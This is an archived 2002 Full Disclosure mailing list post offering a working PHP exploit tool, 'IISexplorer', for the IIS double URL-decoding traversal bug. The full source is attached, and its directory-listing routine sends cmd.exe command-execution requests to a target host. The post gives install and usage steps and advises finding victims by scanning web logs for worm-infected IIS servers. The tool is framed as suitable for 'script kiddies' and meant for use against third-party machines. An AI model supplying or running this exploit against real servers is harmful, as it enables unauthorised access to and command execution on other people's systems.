Full Disclosure mailing list archives
IIS double UTF decoding bug (old) exploit: IIS explorer
From: full-disclosure () lists netsys com (Berend-Jan Wever)
Date: Thu, 11 Jul 2002 17:28:06 +0200
(Ok, it's an old bug but since a lot of non-geeks seem to hate updating their IIS, there still are plenty of valid targets for this exploit.)

-- SCRIPT KIDDIE COMPATIBLE EXPLOIT ATTACHED --
The attached file IISexplorer.php is my "SCRIPT KIDDIE COMPATIBLE" exploit for the double urldecoding bug in IIS. (It's a modified version of PHPexplorer, also written by yours truly ;)

-- HOW TO INSTALL --
Simply put all the icons in the RAR file and the file IISexplorer.php on your PHP enabled webserver. The icons should go into the /icons2/ directory, the IISexplorer.php file can be put anywhere.

-- HOW TO USE --
Browse to http://your-server/path/IISexplorer.php?host=[ip of vulnerable target] and you can browse the target system using an explorer style interface.
Please remember, this is version 0.1 beta! So don't expect it to handle errors well.

-- WHERE TO FIND TARGETS TO EXPLORE --
Scan your webserver's logfiles for "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" to get a list of vulnerable IIS's that have been infected with a worm that propagates through this vulnerability.

-- NOTES --
The left frame takes some time to load, since it requires 1 http request for each directory in the list. Make sure to have a decent connection to the internet because this might use quite some bandwidth ;)

-- FUTURE VERSIONS --
I'm probably not gonna invest more time, since it works. Maybe I'm gonna put in an upload/download facility but that would make stuff a bit too easy for them 14 year olds, wouldn't it ?

-- YOURS TRULY --
Berend-Jan Wever aka SkyLined
http:/spoor12.edup.tudelft.nl

Attachment: IISexplorer.php (application/octet-stream)

<HTML><?php
//--- copyright information ---------------------------------------------------
  global $program_name; $program_name = 'PHP Explorer v0.3 beta';
  global $copyright; $copyright = "\n".
    "-----------------------------------------------------------------------\n".
    $program_name." - Written in may and june 2002 by B.J.W. Wever.\n".
    "Copyright (C) 2002 Berend-Jan Wever <SkyLined () edup tudelft nl>\n".
    "http://Spoor12.edup.tudelft.nl/SkyLined\n".
    "\n".
    "This program is free software; you can redistribute it and/or\n".
    "modify it under the terms of the GNU General Public License\n".
    "version 2, 1991 as published by the Free Software Foundation.\n".
    "\n".
    "This program is distributed in the hope that it will be useful,\n".
    "but WITHOUT ANY WARRANTY; without even the implied warranty of\n".
    "MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n".
    "GNU General Public License for more details.\n".
    "\n".
    "A copy of the GNU General Public License can be found at:\n".
    " http://www.gnu.org/licenses/gpl.html\n".
    "or you can write to:\n".
    " Free Software Foundation, Inc.\n".
    " 59 Temple Place - Suite 330\n".
    " Boston, MA 02111-1307\n".
    " USA.\n".
    "-----------------------------------------------------------------------\n";

//--- initialise global variables ---------------------------------------------
  global $link_header; $link_header = $_SERVER['PHP_SELF'];
  global $path_root; $path_root = '';
  global $path_open; $path_open = '';
  global $hostname; $hostname = '';
  $i_am_tree = false;
  $i_am_list = false;

//--- read parameters ---------------------------------------------------------
  $parameters = explode('&', $argv[0]);
  for ($i=0; $i<count($parameters); $i++) {
    list($parameter, $value) = explode('=', $parameters[$i], 2);
    switch ($parameter) {
      case "root" : $path_root = make_valid_path(urldecode($value)); break;
      case "open" : $path_open = make_valid_path(urldecode($value)); break;
      case "host" : $hostname = urldecode($value); break;
      case "tree" : $i_am_tree = true; break;
      case "list" : $i_am_list = true; break;
    }
  }

//--- handle file uploads -----------------------------------------------------
  if ($_SERVER['REQUEST_METHOD']=='POST') {
    $source_path = $HTTP_POST_FILES['userfile']['tmp_name'];
    $destination_path = './'.make_valid_path($path_open.'/'.$HTTP_POST_FILES['userfile']['name']);
    move_uploaded_file($source_path, $destination_path);
  }

//--- display the index, the tree or the list ---------------------------------
  if ($hostname == '') {
    echo wrap_rem($copyright);
    echo wrap_body('<H1>Host not specified</H1>Please use "../IISexplorer.php?host=<I>ip or hostname</I>."');
  } elseif (!$i_am_tree && $i_am_list) {
    echo create_header().wrap_body(create_list($path_open));
  } elseif ($i_am_tree && !$i_am_list) {
    echo create_header().wrap_body(create_tree(false, '', $path_root, true));
  } else {
    echo wrap_rem($copyright);
    if (!$i_am_tree && !$i_am_list) {
      echo '<FRAMESET framespacing="0" frameborder="no" cols="300, *">'.
             '<FRAME name="tree" style="border-right: 2px inset" src="'.$link_header.'?tree&'.implode('&', $argv).'">'.
             '<FRAME name="main" style="border-left: 2px inset" src="'.$link_header.'?list&'.implode('&', $argv).'">'.
           '</FRAMESET>';
    } else {
      echo wrap_body("<H1>Illegal command line option</H1> IISexplorer can't be <B>tree</B> <I>and</I> <B>list</B> at the same time.");
    }
  }

//-----------------------------------------------------------------------------
//--- list creating function --------------------------------------------------
  function create_list($path) {
    global $hostname, $path_root, $path_open;
    $result = '<TR><TD><BUTTON style="width:100%; text-align:left;">Name</BUTTON>'.
              '<TD><BUTTON style="width:100%; text-align:left;">Size</BUTTON>';
    $total_size = 0;
    list($success, $dirs, $files) = get_directory_contents($path);
    if ($success) {
      if (count($dirs)>0) {
        sort($dirs);
        for ($i=0; $i<count($dirs); $i++) {
          $result .= '<TR><TD><NOBR>'.show_dir('', $dirs[$i]).
                     '<TD class="nosize"><NOBR><DIR>';
        }
      }
      if (count($files)>0) {
        sort($files);
        for ($i=0; $i<count($files); $i++) {
          if (substr($files[$i], -5)=='.phpe') {
            $result .= '<TR><TD><NOBR>'.show_phpe($files[$i]);
          } else {
            $result .= '<TR><TD><NOBR>'.show_file($files[$i]);
          }
//          $result .= '<TD class="size"><NOBR>'.readable_size(filesize($files[$i]));
//          $total_size += filesize($files[$i]);
          $total_size = 0;
        }
      }
    }
//    $disk_free_percentage = round(100* disk_free_space('./'.$path_open) / disk_total_space('./'.$path_open));
    $result = '<FORM id="oForm" enctype="multipart/form-data" method="post" action="?list&host='.$hostname.'&root='.$path_root.'&open='.$path_open.'">'.
                '<TABLE width="100%">'.$result.'</TABLE>'.
                '<CENTER>'.
                  '<HR>'.
                  '<B>'.count($dirs).' </B>'.one_or_many(count($dirs), 'directory', 'directories').', '.
                  '<B>'.count($files).' </B>'.one_or_many(count($files), 'file', 'files').', '.
                '</CENTER>'.
              '</FORM>';
/*
                '<HR>'.
                '<NOBR>'.
                  'To <B>upload</B> a file click '.
                  '<INPUT type="file" name="userfile" style="border:0px; width:0%; height:18px;">'.
                  ' and select a file, then click '.
                  '<INPUT type="submit" value="Upload" style="border:0px; height:18px;">'.
                  ' to upload the file.'.
                '</NOBR>'.
                'disk space used: <B>'.readable_size($total_size).'</B>, '.
                'free disk space: <B>'.readable_size(disk_free_space('./'.$path_open)).'</B>.'.
                '<TABLE width="90%"><TR>'.
                  '<TD class="useddiskspace" width="'.(100-$disk_free_percentage).'%">'.(100-$disk_free_percentage).'% used'.
                  '<TD class="freediskspace">'.$disk_free_percentage.'% free'.
                '</TABLE>'.
*/
    return $result;
  }

//-----------------------------------------------------------------------------
//--- tree creating function --------------------------------------------------
  function create_tree($show_header, $header, $path, $last_entrie) {
    $result = ($show_header ? $header.create_icon('tree'.($last_entrie ? '_last' : '')) : '').
              create_icon('folder_error').last_part($path).'<BR>';
    list($success, $dirs, $files) = get_directory_contents($path);
    if ($success) {
      $icon1 = 'tree'.($last_entrie ? '_last' : '');
      if (count($dirs)>0) $icon1 .= '_branched'. (is_open($path) ? '_open' : '_closed');
      $icon2 = 'tree'.($last_entrie ? '_empty' : '_straight');
      if ($show_header) {
        $ownheader = $header.create_icon($icon1);
        $subheader = $header.create_icon($icon2);
      } else {
        $ownheader = '';
        $subheader = '';
      }
      $result = show_dir($ownheader, $path)."<BR>";
      if (count($dirs)>0 && is_open($path)) {
        sort($dirs);
        for ($i=0; $i<count($dirs); $i++) {
          $result .= create_tree(true, $subheader, $dirs[$i], $i==count($dirs)-1);
        }
      }
    }
    return $result;
  }

//-----------------------------------------------------------------------------
//--- general functions -------------------------------------------------------
  function show_dir($header, $path) {
    global $path_open;
    $name = last_part($path);
    if ($name == '') {
      $name = first_part($_SERVER['PHP_SELF']);
    }
    $link = create_phpexplorer_url($path);
    if ($path == $path_open) {
      $result = $header.wrap_class('open', create_icon('folder_open').$name);
    } else {
      $result = $header.create_icon('folder_closed').$name;
    }
    return wrap_A('_top', $link, $result);
  }
  function show_file($path) {
    $name = last_part($path);
    $link = '/'.make_valid_path(make_valid_path(first_part($_SERVER['PHP_SELF'])).'/'.make_valid_path($path));
    $icon = find_icon($path);
    return wrap_A('_blank', $link, create_icon($icon).$name);
  }
  function show_phpe($path) {
    $name = substr(last_part($path), 0, strlen(last_part($path))-5);
    $link = '/'.make_valid_path(make_valid_path(first_part($_SERVER['PHP_SELF'])).'/'.make_valid_path($path));
    $icon = find_icon($path);
    $phpe = file($path);
    for ($i=0; $i<count($phpe); $i++) {
      if (substr($phpe[$i], 0, 5)=='ICON=') $icon = substr($phpe[$i], 5, 256);
      if (substr($phpe[$i], 0, 5)=='LINK=') $link = substr($phpe[$i], 5, 256);
    }
    return wrap_A('_blank', $link, create_icon($icon).$name);
  }
//-----------------------------------------------------------------------------
//-----------------------------------------------------------------------------
  function is_open($path) {
    global $path_open;
    return strstr($path_open.'/', $path.'/') !== false;
  }
  function make_valid_path($path) {
    while (substr($path, 0, 2) == './') $path = substr($path, 2, strlen($path)-2);
    while (substr($path, 0, 1) == '/') $path = substr($path, 1, strlen($path)-1);
    while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);
    if ($path == '.') {
      $path = '';
    } elseif (
      (strstr($path, '..') !== false) ||
      (strstr($path, '//') !== false) ||
      (substr($path, 0, 1) == '/')
    ) {
      $path = '';
    }
    return $path;
  }
  function last_part($path) {
    if (($result = substr(strrchr($path, '/'), 1)) === false)
      $result = $path;
    return $result;
  }
  function first_part($path) {
    return dirname($path);
  }
//-----------------------------------------------------------------------------
//-----------------------------------------------------------------------------
  function create_header() {
    return '<HEAD><STYLE>'.
      'BODY, IMG, TABLE, TR, TD, A, A:visited, A:active {'.
        'margin:0px; '.
        'border:0px; '.
        'padding:0px; '.
        'font:14 tahoma,sans-serif; '.
        'vertical-align:top; '.
        'text-decoration:none; '.
        'border-collapse:collapse; '.
        'border-spacing:0; '.
      '} '.
      'BUTTON, INPUT {'.
        'font:14 tahoma,sans-serif; '.
        'vertical-align:top; '.
        'padding-left:5px; '.
        'height:22; '.
      '}'.
      '.open {'.
        'background:silver; '.
      '}'.
      '.nosize {'.
        'color:silver; '.
        'text-align:center; '.
      '}'.
      '.size {'.
        'text-align:right; '.
      '}'.
      '.useddiskspace {'.
        'color: white; '.
        'font-weight: bold; '.
        'border: 1px solid black; '.
        'background-color:maroon; '.
      '}'.
      '.freediskspace {'.
        'color: white; '.
        'font-weight: bold; '.
        'text-align:right; '.
        'border: 1px solid black; '.
        'background-color:green; '.
      '}'.
    '</STYLE></HEAD>';
  }
  function wrap_rem($innerHTML) { return '<!--'.$innerHTML.'-->'; }
  function wrap_body($innerHTML) { return '<BODY><NOBR>'.$innerHTML.'</NOBR></BODY>'; }
  function wrap_class($class, $innerHTML) { return '<SPAN class="'.$class.'">'.$innerHTML.'</SPAN>'; }
  function wrap_A($target, $href, $innerHTML) { return '<A target="'.$target.'" href="'.$href.'">'.$innerHTML.'</A>'; }
  function create_icon($icon) { return '<IMG src="/icons2/19x18_'.$icon.'.gif">'; }
  function create_phpexplorer_url($path) { global $hostname, $path_root; return '?host='.$hostname.'&root='.$path_root.'&open='.$path; }
  function find_icon($path) {
    $file_array = explode('.', $path);
    switch ($file_array[count($file_array)-1]) {
      case "jpg" : $icon = 'file_image'; break;
      case "gif" : $icon = 'file_image'; break;
      case "png" : $icon = 'file_image'; break;
      case "doc" : $icon = 'file_document'; break;
      case "txt" : $icon = 'file_text'; break;
      case "xls" : $icon = 'file_excell'; break;
      case "html" : $icon = 'ie'; break;
      case "htm" : $icon = 'ie'; break;
      case "php" : $icon = 'ie'; break;
      case "link" : $icon = 'folder_link'; $link = implode('', file($path)); break;
      default : $icon = 'file'; break;
    }
    return $icon;
  }
  function readable_size($size) {
    $size2 = 'bytes';
    if ($size >= 1024*1024*1024) {
      $size = eregi_replace("([0-9]\.[0-9])[0-9]*", "\\1", $size/(1024*1024*1024));
      $size2 = 'Gb';
    } elseif ($size >= 1024*1024) {
      $size = eregi_replace("([0-9]\.[0-9])[0-9]*", "\\1", $size/(1024*1024));
      $size2 = 'Mb';
    } elseif ($size >= 1024) {
      $size = eregi_replace("([0-9]\.[0-9])[0-9]*", "\\1", $size/(1024));
      $size2 = 'Kb';
    }
    return $size.' '.$size2;
  }
  function one_or_many($count, $one, $many) {
    return ($count==1 ? $one : $many);
  }
  function get_directory_contents($path) {
    global $hostname;
    $result = false;
    $temp = urlencode('..\\..'.(substr($path, 0, 1) == '\\' ? '' : '\\').str_replace('/', '\\', $path));
    $command = 'http://'.$hostname.'/scripts/..%252F../winnt/system32/cmd.exe?/c+dir+/A+/-C+/X+'.$temp;
    if (($directory_handle = fopen($command, 'r')) !== false) {
      if (($temp = fgets($directory_handle, 1024)) !== false) {
        // 1st line: " Directory of x:\xxxxx"
        $result = (substr($temp, 0, 14) == ' Directory of ');
        while (($temp = fgets($directory_handle, 1024)) !== false) {
          // "dd/mm/yyyy hh:mma <DIR> xxxxx FILENAME.EXT LONGFILENAME..."
          // "0.10...... 12.6.. 19.19.............. 39.12....... 55.X..........."
          if (strlen($temp) > 55) {
            // 2nd line: ""
            // 1st to last: " xxxxx File(s) xxxxx bytes"
            // last line: " xxxxx Dir(s) xxxxx bytes free"
            $date = substr($temp, 0, 10);
            $time = substr($temp, 12, 6);
            $size = trim(substr($temp, 19, 19));
            $dosname = trim(substr($temp, 39, 12));
            $fullname = trim(substr($temp, 55));
            $name = ($dosname == '' ? $fullname : $dosname);
            if (substr($name, 0, 1) != '.') {
              if ($size == '<DIR>') {
                $dirs[] = make_valid_path($path.'/'.$name);
              } else {
                $files[] = make_valid_path($path.'/'.$name);
              }
            }
          }
        }
      }
      fclose($directory_handle);
    }
    return array($result, $dirs, $files);
  }
?></HTML>

Attachment: icons2.rar (application/x-rar-compressed)
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 gA== ------=_NextPart_000_000A_01C22900.51AF7FB0--
Current thread:
- IIS double UTF decoding bug (old) exploit: IIS explorer Berend-Jan Wever (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Erik Fichtner (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Matthew S. Hallacy (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)
- IIS double UTF decoding bug (old) exploit: IIS explorer Steve (Jul 11)